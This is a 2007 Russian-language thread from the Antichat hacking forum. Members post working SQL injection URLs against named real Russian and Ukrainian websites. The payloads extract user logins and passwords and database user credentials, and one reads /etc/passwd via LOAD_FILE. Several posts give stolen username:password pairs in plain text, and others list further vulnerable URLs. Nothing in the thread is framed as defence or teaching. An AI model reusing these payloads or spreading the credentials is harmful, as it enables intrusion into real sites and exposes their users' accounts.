Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
04.02.2007, 00:30
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597
Репутация:
1866
|
|
Сообщение от }{0TT@БЬ)Ч
2ice1k
Держи http://www.webismedia.ru/web.php?s=-99'+union+select+1,2,3,4,5,6,7,concat(login,0x3a,p assword),9,10,11,12+from+webismedia_users/*  mla, naverno vse pereproboval krome webismedia_users 
vstre4a vipusknikov vidat' povliyala
thx
|
|
|
04.02.2007, 01:12
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597
Репутация:
1866
|
|
Интернет-служба ITStar - разработка, оптимизация, раскрутка и продвижение сайтов, хостинг, качественный WEB дизайн, PHP, PERL, XML, XSLT, MySQL, CMS
Много же они о себе возомнили =)
http://www.itstar.ru/template.php?dept_id=-99+union+select+1,2,3,0x707265766564,5,6,7,8,9,10, 11,12,13,14/*
Дальше даже юзать не стал пытаться... Аж как-то "стыдно" за таких "отечественных разработчиков" =\ А ведь ещё столького о себе понапишут...
ADD:
http://master-site.com/docs/portfolio/index.php?id=-99+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*
ADD:
http://webmanager-pro.com/index.php?lang_id=1&content_id=-99+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,user ()/*
интересная sql'я сначала даже не понял, где инфа выводится 
мда
Последний раз редактировалось ice1k; 04.02.2007 в 03:31..
|
|
|
|
04.02.2007, 02:42
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597
Репутация:
1866
|
|
Код:
http://www.uralweb.ru/catalog/card.php?id=-99'+union+select+1,2,concat(convert(user+using+cp1251),0x3a,convert(password+using+cp1251)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+mysql.user+limit+0,1/*
Код:
http://www.uralweb.ru/catalog/card.php?id=-99'+union+select+1,2,LOAD_FILE('/etc/passwd'),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/*
etc... =\ |
|
|
|
не ждали, а мы наскулили :) |
04.02.2007, 03:25
|
|
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
Провел на форуме:
1652093
Репутация:
490
|
|
не ждали, а мы наскулили :)
/*****************************/
Код:
http://www.golodomor.org.ua/speech.php?id=-1+union+select+1,user,pass+from+users/*
admin:260729
/******************************/
Код:
http://studybank.info/viewdetails.php?id=-1+union+select+1,2,3,4,5,6,7,passwd,9,10,11,12,username,14+from+user/*
avdinform:123slay
/******************************/
Код:
http://tema.in.ua/article/?id=-1+union+select+1,2,3,4,5,7,8,9,10,11,12,13,14,15,16,17,18,19/*
/******************************/
Код:
http://www.fri.net.ua/loadnews.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*8&page=1
/******************************/
Код:
http://www.kiis.com.ua/index.php?id=-1+union+select+1,2,3,4,user(),6,7,9,8/*&sp=1
/******************************/
Код:
http://www.iom.org.ua/index.php?id=-1+union+select+1,2,3,4,5,6+from+users/*&sub_id=103&action=content&wlng=u
/******************************/
Код:
http://www.golosiyiv.kiev.ua/art?id=-1+union+select+1,2,password,4,5,6,7,8,9,10,11+from+users/*
/******************************/
Код:
http://www.techinvest.com.ua/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9+from+users/*&lang=ua&type=com&act=single
|
|
|
|
04.02.2007, 05:05
|
|
Постоянный
Регистрация: 11.11.2005
Сообщений: 317
Провел на форуме:
2848854
Репутация:
409
|
|
Сибирь-Телеком
_http://www.esir.ru/ru/press/pressrelis/?id_st=-99+union+select+1,2/*
с названием таблиц беда(
|
|
|
|
04.02.2007, 12:39
|
|
Постоянный
Регистрация: 21.04.2006
Сообщений: 540
Провел на форуме:
1310036
Репутация:
726
|
|
_http://inform.com.ua/index.php?s=52'
_http://www.buhgalteria.com.ua/Answer.html?id=2869'
_http://www.ukraina.net.pl/index.php?art=pokaz&num=1241'
_http://www.promsvyaz.kiev.ua/index.php?menu_word=4&command=more&id_news=42&lang =1'
_http://www.video.lg.ua/search.html?beg='
_http://www.el-drive.com.ua/forum/Profile.php?UsId='
|
|
|
|
04.02.2007, 15:36
|
|
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013
Репутация:
453
|
|
http://www.beatles.ru/postman/club_birthday.asp?m=2&d=1+or+1=(SELECT+TOP+1+cast( user_name+as+nvarchar)%2B%27%3A%27%2Bcast(user_ema il+as+nvarchar)%2B%27%3A%27%2Bcast(user_Password+a s+nvarchar)+from+users%20where%20user_id=58)--
А есть какой-нибудь способ вывести инфу со всех пользователей сразу?
|
|
|
|
04.02.2007, 16:09
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597
Репутация:
1866
|
|
Сообщение от злюка
Сибирь-Телеком
_http://www.esir.ru/ru/press/pressrelis/?id_st=-99+union+select+1,2/*
с названием таблиц беда(
Почему беда?
http://www.esir.ru/ru/press/pressrelis/?id_st=-99+union+select+table_name,2+from+INFORMATION_SCHE MA.TABLES+limit+16,1/*
|
|
|
|
04.02.2007, 16:20
|
|
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885
Репутация:
447
|
|
Сообщение от ice1k
Почему беда?
http://www.esir.ru/ru/press/pressrelis/?id_st=-99+union+select+table_name,2+from+INFORMATION_SCHE MA.TABLES+limit+16,1/*
ice1k мля опередил хотя можно помотреть database() и понять что префикс таблицы ds_users
|
|
|
|
04.02.2007, 16:23
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597
Репутация:
1866
|
|
Сообщение от }{0TT@БЬ)Ч
ice1k мля опередил хотя можно помотреть database() и понять что префикс таблицы ds_users Ну так то да, но мало ли - может ему не только юзеры нужны
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
